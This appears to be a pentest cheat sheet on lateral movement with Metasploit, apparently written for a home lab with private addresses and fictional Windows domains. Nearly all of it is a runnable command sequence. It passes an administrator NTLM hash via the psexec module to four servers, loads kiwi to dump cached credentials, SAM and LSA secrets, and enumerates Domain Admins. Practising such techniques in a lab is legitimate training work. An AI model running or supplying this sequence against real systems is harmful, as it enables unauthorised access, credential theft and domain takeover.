Lateral Movement With Metasploit

#Metasploit PTH to Meterpreter

#bronx.north.newyork.local server
use exploit/windows/smb/psexec
info
set smb domain north.newyork.local
set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4
set rhost 192.168.56.11
set lport 4458
run
shell
whoami
hostname
ipconfig
exit 

load kiwi
help
creds_msv
creds_all
lsa_dump_sam
lsa_dump_secrets


Search for Domain Admins
use  post/windows/gather/enum_domain_group_users
set session 1
set group Domain Admins
run

#nyc.newyork.local server
use exploit/windows/smb/psexec
info
set smb domain newyork.local
set rhost 192.168.56.10
set lport 4459
run
shell
whoami
hostname
ipconfig
exit 
load kiwi
help
creds_msv
creds_all
lsa_dump_sam
lsa_dump_secrets

use  post/windows/gather/enum_domain_group_users
set session 1
set group Domain Admins
run

#baltimore.maryland.local server
use exploit/windows/smb/psexec
info
set smb domain maryland.local
set rhost 192.168.56.12
set lport 4459
run
shell
whoami
hostname
ipconfig
exit 
load kiwi
help
creds_msv
creds_all
lsa_dump_sam
lsa_dump_secrets

use  post/windows/gather/enum_domain_group_users
set session 1
set group Domain Admins
run


#Salisbury.maryland.local server
use exploit/windows/smb/psexec
info
set smb domain maryland.local
set rhost 192.168.56.23
set lport 4459
run
shell
whoami
hostname
ipconfig
exit 
load kiwi
help
creds_msv
creds_all
lsa_dump_sam
lsa_dump_secrets


use  post/windows/gather/enum_domain_group_users
set session 1
set group Domain Admins
run

Last updated